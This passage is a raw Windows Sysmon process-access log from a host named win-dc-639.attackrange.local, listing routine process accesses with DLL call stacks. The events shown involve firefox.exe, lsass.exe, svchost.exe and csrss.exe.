Firefox\xul.dll+c6a3d7|C:\Program Files\Mozilla Firefox\xul.dll+29283d|C:\Program Files\Mozilla Firefox\xul.dll+2923d1|C:\Program Files\Mozilla Firefox\xul.dll+f8f7e5|C:\Program Files\Mozilla Firefox\xul.dll+1777f6f|C:\Program Files\Mozilla Firefox\xul.dll+1776835|C:\Program Files\Mozilla Firefox\xul.dll+c6c72f|C:\Program Files\Mozilla Firefox\xul.dll+274461|C:\Program Files\Mozilla Firefox\xul.dll+38136e|C:\Program Files\Mozilla Firefox\xul.dll+cfeed6|C:\Program Files\Mozilla Firefox\xul.dll+176953f|C:\Program Files\Mozilla Firefox\xul.dll+16fdc02 10341000x8000000000000000105114Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:30.245{58E9C193-B422-615A-0602-00000000FC01}55524560C:\Program Files\Mozilla Firefox\firefox.exe{58E9C193-B426-615A-0A02-00000000FC01}5532C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1b78e1|C:\Program Files\Mozilla Firefox\xul.dll+a026ef|C:\Program Files\Mozilla Firefox\xul.dll+a5a8dd|C:\Program Files\Mozilla Firefox\xul.dll+a4fe8a|C:\Program Files\Mozilla Firefox\xul.dll+a4fd44|C:\Program Files\Mozilla Firefox\xul.dll+8ef13e|C:\Program Files\Mozilla Firefox\xul.dll+e48d30|C:\Program Files\Mozilla Firefox\xul.dll+e4828c|C:\Program Files\Mozilla Firefox\xul.dll+e4a6e0|C:\Program Files\Mozilla Firefox\xul.dll+c6cf0f|C:\Program Files\Mozilla Firefox\xul.dll+c6a3d7|C:\Program Files\Mozilla Firefox\xul.dll+29283d|C:\Program Files\Mozilla Firefox\xul.dll+2923d1|C:\Program Files\Mozilla Firefox\xul.dll+f8f7e5|C:\Program Files\Mozilla Firefox\xul.dll+1777f6f|C:\Program Files\Mozilla Firefox\xul.dll+1776835|C:\Program Files\Mozilla Firefox\xul.dll+c6c72f|C:\Program Files\Mozilla Firefox\xul.dll+274461|C:\Program Files\Mozilla Firefox\xul.dll+38136e|C:\Program Files\Mozilla Firefox\xul.dll+cfeed6|C:\Program Files\Mozilla Firefox\xul.dll+176953f|C:\Program Files\Mozilla Firefox\xul.dll+16fdc02 10341000x8000000000000000105113Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:30.245{58E9C193-B422-615A-0602-00000000FC01}55524560C:\Program Files\Mozilla Firefox\firefox.exe{58E9C193-B426-615A-0A02-00000000FC01}5532C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1b78e1|C:\Program Files\Mozilla Firefox\xul.dll+a026ef|C:\Program Files\Mozilla Firefox\xul.dll+a5a8dd|C:\Program Files\Mozilla Firefox\xul.dll+a4fe8a|C:\Program Files\Mozilla Firefox\xul.dll+a4fd44|C:\Program Files\Mozilla Firefox\xul.dll+8ef13e|C:\Program Files\Mozilla Firefox\xul.dll+e48d30|C:\Program Files\Mozilla Firefox\xul.dll+e4828c|C:\Program Files\Mozilla Firefox\xul.dll+e4a6e0|C:\Program Files\Mozilla Firefox\xul.dll+c6cf0f|C:\Program Files\Mozilla Firefox\xul.dll+c6a3d7|C:\Program Files\Mozilla Firefox\xul.dll+29283d|C:\Program Files\Mozilla Firefox\xul.dll+2923d1|C:\Program Files\Mozilla Firefox\xul.dll+f8f7e5|C:\Program Files\Mozilla Firefox\xul.dll+1777f6f|C:\Program Files\Mozilla Firefox\xul.dll+1776835|C:\Program Files\Mozilla Firefox\xul.dll+c6c72f|C:\Program Files\Mozilla Firefox\xul.dll+274461|C:\Program Files\Mozilla Firefox\xul.dll+38136e|C:\Program Files\Mozilla Firefox\xul.dll+cfeed6|C:\Program Files\Mozilla Firefox\xul.dll+176953f|C:\Program Files\Mozilla Firefox\xul.dll+16fdc02 10341000x8000000000000000105112Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:30.245{58E9C193-B422-615A-0602-00000000FC01}55524560C:\Program Files\Mozilla Firefox\firefox.exe{58E9C193-B426-615A-0A02-00000000FC01}5532C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1b78e1|C:\Program Files\Mozilla Firefox\xul.dll+a026ef|C:\Program Files\Mozilla Firefox\xul.dll+a5a8dd|C:\Program Files\Mozilla Firefox\xul.dll+a4fe8a|C:\Program Files\Mozilla Firefox\xul.dll+a4fd44|C:\Program Files\Mozilla Firefox\xul.dll+8ef13e|C:\Program Files\Mozilla Firefox\xul.dll+e48d30|C:\Program Files\Mozilla Firefox\xul.dll+e4828c|C:\Program Files\Mozilla Firefox\xul.dll+e4a6e0|C:\Program Files\Mozilla Firefox\xul.dll+c6cf0f|C:\Program Files\Mozilla Firefox\xul.dll+c6a3d7|C:\Program Files\Mozilla Firefox\xul.dll+29283d|C:\Program Files\Mozilla Firefox\xul.dll+2923d1|C:\Program Files\Mozilla Firefox\xul.dll+f8f7e5|C:\Program Files\Mozilla Firefox\xul.dll+1777f6f|C:\Program Files\Mozilla Firefox\xul.dll+1776835|C:\Program Files\Mozilla Firefox\xul.dll+c6c72f|C:\Program Files\Mozilla Firefox\xul.dll+274461|C:\Program Files\Mozilla Firefox\xul.dll+38136e|C:\Program Files\Mozilla Firefox\xul.dll+cfeed6|C:\Program Files\Mozilla Firefox\xul.dll+176953f|C:\Program Files\Mozilla Firefox\xul.dll+16fdc02 10341000x8000000000000000105111Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:30.245{58E9C193-B422-615A-0602-00000000FC01}55524560C:\Program Files\Mozilla Firefox\firefox.exe{58E9C193-B426-615A-0A02-00000000FC01}5532C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1b78e1|C:\Program Files\Mozilla Firefox\xul.dll+a026ef|C:\Program Files\Mozilla Firefox\xul.dll+a5a8dd|C:\Program Files\Mozilla Firefox\xul.dll+a4fe8a|C:\Program Files\Mozilla Firefox\xul.dll+a4fd44|C:\Program Files\Mozilla Firefox\xul.dll+8ef13e|C:\Program Files\Mozilla Firefox\xul.dll+e48d30|C:\Program Files\Mozilla Firefox\xul.dll+e4828c|C:\Program Files\Mozilla Firefox\xul.dll+e4a6e0|C:\Program Files\Mozilla Firefox\xul.dll+c6cf0f|C:\Program Files\Mozilla Firefox\xul.dll+c6a3d7|C:\Program Files\Mozilla Firefox\xul.dll+29283d|C:\Program Files\Mozilla Firefox\xul.dll+2923d1|C:\Program Files\Mozilla Firefox\xul.dll+f8f7e5|C:\Program Files\Mozilla Firefox\xul.dll+1777f6f|C:\Program Files\Mozilla Firefox\xul.dll+1776835|C:\Program Files\Mozilla Firefox\xul.dll+c6c72f|C:\Program Files\Mozilla Firefox\xul.dll+274461|C:\Program Files\Mozilla Firefox\xul.dll+38136e|C:\Program Files\Mozilla Firefox\xul.dll+cfeed6|C:\Program Files\Mozilla Firefox\xul.dll+176953f|C:\Program Files\Mozilla Firefox\xul.dll+16fdc02 10341000x8000000000000000105110Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:30.245{58E9C193-B422-615A-0602-00000000FC01}55524560C:\Program Files\Mozilla Firefox\firefox.exe{58E9C193-B426-615A-0A02-00000000FC01}5532C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1b78e1|C:\Program Files\Mozilla Firefox\xul.dll+a026ef|C:\Program Files\Mozilla Firefox\xul.dll+a5a8dd|C:\Program Files\Mozilla Firefox\xul.dll+a4fe8a|C:\Program Files\Mozilla Firefox\xul.dll+a4fd44|C:\Program Files\Mozilla Firefox\xul.dll+8ef13e|C:\Program Files\Mozilla Firefox\xul.dll+e48d30|C:\Program Files\Mozilla Firefox\xul.dll+e4828c|C:\Program Files\Mozilla Firefox\xul.dll+e4a6e0|C:\Program Files\Mozilla Firefox\xul.dll+c6cf0f|C:\Program Files\Mozilla Firefox\xul.dll+c6a3d7|C:\Program Files\Mozilla Firefox\xul.dll+29283d|C:\Program Files\Mozilla Firefox\xul.dll+2923d1|C:\Program Files\Mozilla Firefox\xul.dll+f8f7e5|C:\Program Files\Mozilla Firefox\xul.dll+1777f6f|C:\Program Files\Mozilla Firefox\xul.dll+1776835|C:\Program Files\Mozilla Firefox\xul.dll+c6c72f|C:\Program Files\Mozilla Firefox\xul.dll+274461|C:\Program Files\Mozilla Firefox\xul.dll+38136e|C:\Program Files\Mozilla Firefox\xul.dll+cfeed6|C:\Program Files\Mozilla Firefox\xul.dll+176953f|C:\Program Files\Mozilla Firefox\xul.dll+16fdc02 10341000x8000000000000000105109Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:30.245{58E9C193-B422-615A-0602-00000000FC01}55524560C:\Program Files\Mozilla Firefox\firefox.exe{58E9C193-B426-615A-0A02-00000000FC01}5532C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1b78e1|C:\Program Files\Mozilla Firefox\xul.dll+a026ef|C:\Program Files\Mozilla Firefox\xul.dll+a4ff28|C:\Program Files\Mozilla Firefox\xul.dll+e5acd8|C:\Program Files\Mozilla Firefox\xul.dll+e48ccc|C:\Program Files\Mozilla Firefox\xul.dll+e4828c|C:\Program Files\Mozilla Firefox\xul.dll+e4a6e0|C:\Program Files\Mozilla Firefox\xul.dll+c6cf0f|C:\Program Files\Mozilla Firefox\xul.dll+c6a3d7|C:\Program Files\Mozilla Firefox\xul.dll+29283d|C:\Program Files\Mozilla Firefox\xul.dll+2923d1|C:\Program Files\Mozilla Firefox\xul.dll+f8f7e5|C:\Program Files\Mozilla Firefox\xul.dll+1777f6f|C:\Program Files\Mozilla Firefox\xul.dll+1776835|C:\Program Files\Mozilla Firefox\xul.dll+c6c72f|C:\Program Files\Mozilla Firefox\xul.dll+274461|C:\Program Files\Mozilla Firefox\xul.dll+38136e|C:\Program Files\Mozilla Firefox\xul.dll+cfeed6|C:\Program Files\Mozilla Firefox\xul.dll+176953f|C:\Program Files\Mozilla Firefox\xul.dll+16fdc02|C:\Program Files\Mozilla Firefox\xul.dll+16d21c4|C:\Program Files\Mozilla Firefox\xul.dll+1b6175d 10341000x8000000000000000105108Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:30.245{58E9C193-B422-615A-0602-00000000FC01}55524560C:\Program Files\Mozilla Firefox\firefox.exe{58E9C193-B426-615A-0A02-00000000FC01}5532C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1b78e1|C:\Program Files\Mozilla Firefox\xul.dll+a026ef|C:\Program Files\Mozilla Firefox\xul.dll+a4ff28|C:\Program Files\Mozilla Firefox\xul.dll+e5acd8|C:\Program Files\Mozilla Firefox\xul.dll+2165eb|C:\Program Files\Mozilla Firefox\xul.dll+e48cc1|C:\Program Files\Mozilla Firefox\xul.dll+e4828c|C:\Program Files\Mozilla Firefox\xul.dll+e4a6e0|C:\Program Files\Mozilla Firefox\xul.dll+c6cf0f|C:\Program Files\Mozilla Firefox\xul.dll+c6a3d7|C:\Program Files\Mozilla Firefox\xul.dll+29283d|C:\Program Files\Mozilla Firefox\xul.dll+2923d1|C:\Program Files\Mozilla Firefox\xul.dll+f8f7e5|C:\Program Files\Mozilla Firefox\xul.dll+1777f6f|C:\Program Files\Mozilla Firefox\xul.dll+1776835|C:\Program Files\Mozilla Firefox\xul.dll+c6c72f|C:\Program Files\Mozilla Firefox\xul.dll+274461|C:\Program Files\Mozilla Firefox\xul.dll+38136e|C:\Program Files\Mozilla Firefox\xul.dll+cfeed6|C:\Program Files\Mozilla Firefox\xul.dll+176953f|C:\Program Files\Mozilla Firefox\xul.dll+16fdc02|C:\Program Files\Mozilla Firefox\xul.dll+16d21c4 10341000x8000000000000000105107Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:30.245{58E9C193-B422-615A-0602-00000000FC01}55524560C:\Program Files\Mozilla Firefox\firefox.exe{58E9C193-B426-615A-0902-00000000FC01}6624C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1b78e1|C:\Program Files\Mozilla Firefox\xul.dll+a026ef|C:\Program Files\Mozilla Firefox\xul.dll+a4ff28|C:\Program Files\Mozilla Firefox\xul.dll+e5acd8|C:\Program Files\Mozilla Firefox\xul.dll+2165eb|C:\Program Files\Mozilla Firefox\xul.dll+e48cc1|C:\Program Files\Mozilla Firefox\xul.dll+e4828c|C:\Program Files\Mozilla Firefox\xul.dll+e4a6e0|C:\Program Files\Mozilla Firefox\xul.dll+c6cf0f|C:\Program Files\Mozilla Firefox\xul.dll+c6a3d7|C:\Program Files\Mozilla Firefox\xul.dll+29283d|C:\Program Files\Mozilla Firefox\xul.dll+2923d1|C:\Program Files\Mozilla Firefox\xul.dll+f8f7e5|C:\Program Files\Mozilla Firefox\xul.dll+1777f6f|C:\Program Files\Mozilla Firefox\xul.dll+1776835|C:\Program Files\Mozilla Firefox\xul.dll+c6c72f|C:\Program Files\Mozilla Firefox\xul.dll+274461|C:\Program Files\Mozilla Firefox\xul.dll+38136e|C:\Program Files\Mozilla Firefox\xul.dll+cfeed6|C:\Program Files\Mozilla Firefox\xul.dll+176953f|C:\Program Files\Mozilla Firefox\xul.dll+16fdc02|C:\Program Files\Mozilla Firefox\xul.dll+16d21c4 10341000x8000000000000000105106Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:30.245{58E9C193-B422-615A-0602-00000000FC01}55524560C:\Program Files\Mozilla Firefox\firefox.exe{58E9C193-B426-615A-0802-00000000FC01}1112C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1b78e1|C:\Program Files\Mozilla Firefox\xul.dll+a026ef|C:\Program Files\Mozilla Firefox\xul.dll+a4ff28|C:\Program Files\Mozilla Firefox\xul.dll+e5acd8|C:\Program Files\Mozilla Firefox\xul.dll+2165eb|C:\Program Files\Mozilla Firefox\xul.dll+e48cc1|C:\Program Files\Mozilla Firefox\xul.dll+e4828c|C:\Program Files\Mozilla Firefox\xul.dll+e4a6e0|C:\Program Files\Mozilla Firefox\xul.dll+c6cf0f|C:\Program Files\Mozilla Firefox\xul.dll+c6a3d7|C:\Program Files\Mozilla Firefox\xul.dll+29283d|C:\Program Files\Mozilla Firefox\xul.dll+2923d1|C:\Program Files\Mozilla Firefox\xul.dll+f8f7e5|C:\Program Files\Mozilla Firefox\xul.dll+1777f6f|C:\Program Files\Mozilla Firefox\xul.dll+1776835|C:\Program Files\Mozilla Firefox\xul.dll+c6c72f|C:\Program Files\Mozilla Firefox\xul.dll+274461|C:\Program Files\Mozilla Firefox\xul.dll+38136e|C:\Program Files\Mozilla Firefox\xul.dll+cfeed6|C:\Program Files\Mozilla Firefox\xul.dll+176953f|C:\Program Files\Mozilla Firefox\xul.dll+16fdc02|C:\Program Files\Mozilla Firefox\xul.dll+16d21c4 10341000x8000000000000000105105Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:30.245{58E9C193-B422-615A-0602-00000000FC01}55524560C:\Program Files\Mozilla Firefox\firefox.exe{58E9C193-B426-615A-0A02-00000000FC01}5532C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1b78e1|C:\Program Files\Mozilla Firefox\xul.dll+9f23c4|C:\Program Files\Mozilla Firefox\xul.dll+e48c43|C:\Program Files\Mozilla Firefox\xul.dll+e4828c|C:\Program Files\Mozilla Firefox\xul.dll+e4a6e0|C:\Program Files\Mozilla Firefox\xul.dll+c6cf0f|C:\Program Files\Mozilla Firefox\xul.dll+c6a3d7|C:\Program Files\Mozilla Firefox\xul.dll+29283d|C:\Program Files\Mozilla Firefox\xul.dll+2923d1|C:\Program Files\Mozilla Firefox\xul.dll+f8f7e5|C:\Program Files\Mozilla Firefox\xul.dll+1777f6f|C:\Program Files\Mozilla Firefox\xul.dll+1776835|C:\Program Files\Mozilla Firefox\xul.dll+c6c72f|C:\Program Files\Mozilla Firefox\xul.dll+274461|C:\Program Files\Mozilla Firefox\xul.dll+38136e|C:\Program Files\Mozilla Firefox\xul.dll+cfeed6|C:\Program Files\Mozilla Firefox\xul.dll+176953f|C:\Program Files\Mozilla Firefox\xul.dll+16fdc02|C:\Program Files\Mozilla Firefox\xul.dll+16d21c4|C:\Program Files\Mozilla Firefox\xul.dll+1b6175d|C:\Program Files\Mozilla Firefox\xul.dll+16fe0ad|C:\Program Files\Mozilla Firefox\xul.dll+16d21c4 10341000x8000000000000000105104Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:30.245{58E9C193-B422-615A-0602-00000000FC01}55524560C:\Program Files\Mozilla Firefox\firefox.exe{58E9C193-B426-615A-0A02-00000000FC01}5532C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1b78e1|C:\Program Files\Mozilla Firefox\xul.dll+9f23c4|C:\Program Files\Mozilla Firefox\xul.dll+c2e55|C:\Program Files\Mozilla Firefox\xul.dll+e4891a|C:\Program Files\Mozilla Firefox\xul.dll+e4828c|C:\Program Files\Mozilla Firefox\xul.dll+e4a6e0|C:\Program Files\Mozilla Firefox\xul.dll+c6cf0f|C:\Program Files\Mozilla Firefox\xul.dll+c6a3d7|C:\Program Files\Mozilla Firefox\xul.dll+29283d|C:\Program Files\Mozilla Firefox\xul.dll+2923d1|C:\Program Files\Mozilla Firefox\xul.dll+f8f7e5|C:\Program Files\Mozilla Firefox\xul.dll+1777f6f|C:\Program Files\Mozilla Firefox\xul.dll+1776835|C:\Program Files\Mozilla Firefox\xul.dll+c6c72f|C:\Program Files\Mozilla Firefox\xul.dll+274461|C:\Program Files\Mozilla Firefox\xul.dll+38136e|C:\Program Files\Mozilla Firefox\xul.dll+cfeed6|C:\Program Files\Mozilla Firefox\xul.dll+176953f|C:\Program Files\Mozilla Firefox\xul.dll+16fdc02|C:\Program Files\Mozilla Firefox\xul.dll+16d21c4|C:\Program Files\Mozilla Firefox\xul.dll+1b6175d|C:\Program Files\Mozilla Firefox\xul.dll+16fe0ad 10341000x8000000000000000105103Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:30.245{58E9C193-B422-615A-0602-00000000FC01}55525064C:\Program Files\Mozilla Firefox\firefox.exe{58E9C193-B426-615A-0A02-00000000FC01}5532C:\Program Files\Mozilla Firefox\firefox.exe0x101451C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+a0942f|C:\Program Files\Mozilla Firefox\xul.dll+878864|C:\Program Files\Mozilla Firefox\xul.dll+166d71b|C:\Program Files\Mozilla Firefox\xul.dll+19cd045|C:\Program Files\Mozilla Firefox\xul.dll+13c95|C:\Program Files\Mozilla Firefox\xul.dll+9f4b1f|C:\Program Files\Mozilla Firefox\xul.dll+13378|C:\Program Files\Mozilla Firefox\xul.dll+9f2211|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000105102Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:30.245{58E9C193-ACA5-615A-0B00-00000000FC01}6282264C:\Windows\system32\lsass.exe{58E9C193-B426-615A-0902-00000000FC01}6624C:\Program Files\Mozilla Firefox\firefox.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+24be7|C:\Windows\system32\lsasrv.dll+25d2d|C:\Windows\system32\lsasrv.dll+24a65|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000105101Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:30.245{58E9C193-ACA5-615A-0B00-00000000FC01}6282264C:\Windows\system32\lsass.exe{58E9C193-B426-615A-0902-00000000FC01}6624C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\lsasrv.dll+249ad|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000105100Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:30.230{58E9C193-ACA7-615A-1400-00000000FC01}9401608C:\Windows\system32\svchost.exe{58E9C193-B426-615A-0802-00000000FC01}1112C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6cc4|c:\windows\system32\fntcache.dll+17acf|c:\windows\system32\fntcache.dll+1a697|c:\windows\system32\fntcache.dll+1aacc|c:\windows\system32\fntcache.dll+5034e|c:\windows\system32\fntcache.dll+50052|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000105099Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:30.230{58E9C193-ACA7-615A-1400-00000000FC01}9401608C:\Windows\system32\svchost.exe{58E9C193-B426-615A-0802-00000000FC01}1112C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6cc4|c:\windows\system32\fntcache.dll+17acf|c:\windows\system32\fntcache.dll+1a697|c:\windows\system32\fntcache.dll+1aacc|c:\windows\system32\fntcache.dll+5034e|c:\windows\system32\fntcache.dll+50052|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000105098Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:30.230{58E9C193-ACA7-615A-0C00-00000000FC01}8403540C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000105097Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:30.230{58E9C193-ACA7-615A-0C00-00000000FC01}8403540C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000105096Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:30.230{58E9C193-ACA7-615A-0C00-00000000FC01}8403540C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000105095Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:30.230{58E9C193-ACA7-615A-0C00-00000000FC01}8403540C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000105094Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:30.230{58E9C193-AE62-615A-B200-00000000FC01}32126164C:\Windows\system32\csrss.exe{58E9C193-B426-615A-0A02-00000000FC01}5532C:\Program Files\Mozilla 